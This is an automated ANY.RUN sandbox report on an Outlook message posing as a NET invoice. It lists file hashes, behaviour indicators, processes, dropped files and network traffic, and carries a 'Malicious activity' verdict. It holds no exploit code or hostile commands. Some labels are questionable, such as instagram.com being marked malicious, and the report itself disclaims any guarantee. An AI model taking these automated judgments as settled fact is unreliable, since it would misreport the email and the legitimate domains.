analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Sua fatura NET MAURIZIO BILLI.msg

Full analysis: https://app.any.run/tasks/0733d394-3de2-4360-b4f2-93220d5e1aa7
Verdict: Malicious activity
Analysis date: July 17, 2019, 11:48:15
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

5E35DBD9B2E58D0602E7B534D98BB351

SHA1:

DEB43049691E8A5E15EA7B46DA6F208C3411541F

SHA256:

B1B41CCD4FF7741609091D4DFEBA10C96A2BC30A5FE6EABE0809BDA023B41857

SSDEEP:

1536:Y8UfDzKhhWkWQ9gtAuNtNBqOhbuzIw3IW7m:zUfDzKctNBhbWIw3IW7m

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • OUTLOOK.EXE (PID: 3512)
  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 3512)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 3512)
    • Starts Internet Explorer

      • OUTLOOK.EXE (PID: 3512)
    • Modifies files in Chrome extension folder

      • chrome.exe (PID: 1024)
  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 3312)
      • iexplore.exe (PID: 2276)
    • Changes internet zones settings

      • iexplore.exe (PID: 2056)
      • iexplore.exe (PID: 2276)
      • iexplore.exe (PID: 2788)
    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 3512)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 3312)
      • iexplore.exe (PID: 3464)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2868)
      • iexplore.exe (PID: 3312)
      • iexplore.exe (PID: 3464)
    • Reads settings of System Certificates

      • iexplore.exe (PID: 2056)
      • iexplore.exe (PID: 2276)
      • chrome.exe (PID: 3692)
    • Dropped object may contain Bitcoin addresses

      • iexplore.exe (PID: 3312)
    • Application launched itself

      • iexplore.exe (PID: 2788)
      • chrome.exe (PID: 1024)
    • Manual execution by user

      • chrome.exe (PID: 1024)
    • Dropped object may contain TOR URL's

      • chrome.exe (PID: 1024)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (58.9)
.oft | Outlook Form Template (34.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
68
Monitored processes
31
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe iexplore.exe chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3512"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Sua fatura NET MAURIZIO BILLI.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
2056"C:\Program Files\Internet Explorer\iexplore.exe" https://www.instagram.com/netoficialC:\Program Files\Internet Explorer\iexplore.exe
OUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2868"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2056 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2276"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/NEToficialC:\Program Files\Internet Explorer\iexplore.exe
OUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3312"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2276 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2788"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/NEToficialC:\Program Files\Internet Explorer\iexplore.exe
OUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3464"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2788 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1024"C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
3221225547
Version:
75.0.3770.100
2504"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=75.0.3770.100 --initial-client-data=0x7c,0x80,0x84,0x78,0x88,0x722aa9d0,0x722aa9e0,0x722aa9ecC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
3960"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1224 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
75.0.3770.100
Total events
3 095
Read events
2 421
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
86
Text files
326
Unknown types
20

Dropped files

PID
Process
Filename
Type
3512OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRCF17.tmp.cvr
MD5:
SHA256:
3512OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:F328C43E2864795DD4C08E70F3AF2257
SHA256:88030A9D376522F16DA0446BCAD1644EAE48AE0E8BA29318C79261357286ABCE
3512OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\StructuredQuery.logtext
MD5:7C5EEE003DDDB37E82B14C8E2F60A875
SHA256:DE85171B94D602C18B57B797C6C97B8E123A71F1CFB81781E87A545742A15EAB
3512OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\topo[1].jpgimage
MD5:F5AAA0D35ABC5A9383D470244F34C372
SHA256:BE627EB57F98580F33FAF1BB07D284268CDA4EE87B06A0830BF294A6C6F11B76
3512OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\social-4[1].gifimage
MD5:2527362DEDE0EC63F5A46B7DECCD3F94
SHA256:93469C22CECFE17440D67F5EE90BE156775B9ED235BED660DAEF813E3CB9C5B1
3512OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\social-2[1].gifimage
MD5:A80E1F4F543096530610842F8F111970
SHA256:3E6920E2E3BCC690C96E15EE4398E44EFD79F2465BE3B4326379A8928B5A33B8
3512OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\social-5[1].gifimage
MD5:FA40C2907E23E952A209E05D7C3490B3
SHA256:B2F61234797725E72D4C00C69376626E687710EE89B24954B8787229849DF76E
3512OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\banner[1].jpgimage
MD5:4F0717F4E3359EE12CFFED1CCAD407C8
SHA256:44AFDE8AFE7D804267AB7AB83B482D71819B527DE7AA39FF9EA8771BD1FEFB2A
3512OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\siga[1].gifimage
MD5:5CC69F81DA215931F08B6D5F0B621509
SHA256:D2907A5DB95BF533B2538D8F416E998893B449CFD081A40902F62185F654FA19
3512OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txttext
MD5:B10B0FE1947E4F5C992EE06B971919D5
SHA256:B6B7E161E37592D0DC4ED2BA3BB8457C9EE0678D8BE4A1FE2C5E35FB17C57D95
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
96
DNS requests
34
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3512
OUTLOOK.EXE
GET
301
152.195.52.2:80
http://www.netcombo.com.br/static/email/20161118120507/images/logo.jpg
US
whitelisted
3512
OUTLOOK.EXE
GET
301
152.195.52.2:80
http://www.netcombo.com.br/static/email/20161118120507/images/social-4.gif
US
whitelisted
3512
OUTLOOK.EXE
GET
301
152.195.52.2:80
http://www.netcombo.com.br/static/email/20161118120507/images/siga.gif
US
whitelisted
3512
OUTLOOK.EXE
GET
301
152.195.52.2:80
http://www.netcombo.com.br/static/email/20161118120507/images/social-5.gif
US
whitelisted
3512
OUTLOOK.EXE
GET
301
152.195.52.2:80
http://www.netcombo.com.br/static/email/20161118120507/images/social-2.gif
US
whitelisted
3512
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3512
OUTLOOK.EXE
GET
301
152.195.52.2:80
http://www.netcombo.com.br/static/email/20161118120507/images/social-3.gif
US
whitelisted
3512
OUTLOOK.EXE
GET
301
152.195.52.2:80
http://www.netcombo.com.br/static/email/20161118120507/images/social-1.gif
US
whitelisted
3692
chrome.exe
GET
204
172.217.25.131:80
http://csi.gstatic.com/csi?v=3&s=gapi_module&action=gapi_iframes__googleapis_cli12&it=mli.188,mei.17&srt=16&tbsrt=2321&tran=15&e=abc_l0,abc_m0,abc_pgapi_iframes__googleapis_cli12,abc_u0&rt=
US
whitelisted
3512
OUTLOOK.EXE
GET
301
152.195.52.2:80
http://www.netcombo.com.br/static/email/20161118120507/images/banner.jpg
US
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3312
iexplore.exe
31.13.92.36:443
m.facebook.com
Facebook, Inc.
IE
whitelisted
2276
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2056
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3312
iexplore.exe
185.60.216.35:443
www.facebook.com
Facebook, Inc.
IE
whitelisted
3312
iexplore.exe
157.240.20.19:443
static.xx.fbcdn.net
Facebook, Inc.
US
whitelisted
3312
iexplore.exe
31.13.64.21:443
scontent-amt2-1.xx.fbcdn.net
Facebook, Inc.
IE
whitelisted
3512
OUTLOOK.EXE
152.195.52.2:80
www.netcombo.com.br
MCI Communications Services, Inc. d/b/a Verizon Business
US
unknown
2868
iexplore.exe
31.13.92.174:443
www.instagram.com
Facebook, Inc.
IE
malicious
3512
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
2056
iexplore.exe
31.13.92.174:443
www.instagram.com
Facebook, Inc.
IE
malicious

DNS requests

Domain
IP
Reputation
www.netcombo.com.br
  • 152.195.52.2
whitelisted
config.messenger.msn.com
  • 64.4.26.155
whitelisted
www.instagram.com
  • 31.13.92.174
whitelisted
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.facebook.com
  • 185.60.216.35
whitelisted
m.facebook.com
  • 31.13.92.36
whitelisted
static.xx.fbcdn.net
  • 157.240.20.19
whitelisted
scontent-amt2-1.xx.fbcdn.net
  • 31.13.64.21
whitelisted
facebook.com
  • 31.13.92.36
whitelisted
fbcdn.net
  • 31.13.92.36
whitelisted

Threats

No threats detected
No debug info